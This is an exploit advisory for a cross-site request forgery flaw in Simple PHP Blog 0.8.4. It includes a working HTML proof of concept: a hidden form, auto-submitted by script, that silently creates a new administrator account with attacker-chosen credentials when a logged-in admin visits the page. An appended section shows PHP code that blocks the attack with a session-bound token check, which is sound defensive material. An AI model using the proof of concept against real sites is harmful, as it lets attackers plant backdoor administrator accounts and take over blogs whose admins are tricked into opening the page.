<!--
=========================================================================================================
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
=========================================================================================================

# Exploit Title: Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
# Author: Besim
# Google Dork: -
# Date: 07/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: http://simpleblogphp.com/
# Software Link: https://sourceforge.net/projects/sphpblog/
# Version: 0.8.4
# Tested on: Ubuntu 14.04.5

Simple PHP Blog 0.8.4 is vulnerable to CSRF (no CSRF token in place),
meaning that if an admin user can be tricked into visiting a crafted URL
created by an attacker (via spear phishing/social engineering), a form will
be submitted to
(http://localhost/simple/manage_users.php?action=update&type=new)
that adds a new user as administrator.

Once exploited, the attacker can log in to the admin panel
(http://localhost/simple/login.php)
using the username and the password submitted in the form.

CSRF PoC Code
=============
-->
<html>
<body>
<form action="http://localhost/simple/manage_users.php?action=update&type=new" method="POST">
<input type="hidden" name="sUsername" value="Besim"/>
<input type="hidden" name="sFullname" value="Besim"/>
<input type="hidden" name="sPassword" value="mehmet"/>
<input type="hidden" name="sEmail" value="mehmet@yopmail.com"/>
<input type="hidden" name="sAvatar" value=""/>
<input type="hidden" name="sActive" value="on"/>
<input type="hidden" name="sModComments" value="on"/>
<input type="hidden" name="sDeleteEntries" value="on"/>
<input type="hidden" name="sEditAny" value="on"/>
<input type="hidden" name="submit" value="Create User"/>
<input type="submit" value="Submit request"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
--
Besim ALTiNOK
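
The forged form is accepted because the user-creation request carries nothing that ties it to the admin's own session. As an added example (not part of the original advisory and not Simple PHP Blog's code), here is a session-bound token check that rejects such a request; the helper names and the `csrf_token` field are hypothetical, and PHP 7.3+ with native sessions is assumed.

```php
<?php
// Added example: synchronizer-token CSRF check for a state-changing admin form.
// csrf_token(), csrf_field() and csrf_verify() are hypothetical helper names,
// not functions from Simple PHP Blog. Assumes PHP 7.3+ and native sessions.

session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Strict',   // browser omits the session cookie on cross-site POSTs
]);
session_start();

/** Return the per-session token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to embed in every form that changes state. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '"/>';
}

/** True only when the request carries the token bound to this session. */
function csrf_verify(array $post): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($sent) && $expected !== ''
        && hash_equals($expected, $sent);   // constant-time comparison
}

// Guard placed ahead of the user-creation logic in the request handler.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_verify($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The handler's own user-creation code runs only past this point.
}
```

The legitimate form emits `csrf_field()` alongside its other inputs; a page on another origin cannot read the token, so the auto-submitted form above fails the check with a 403.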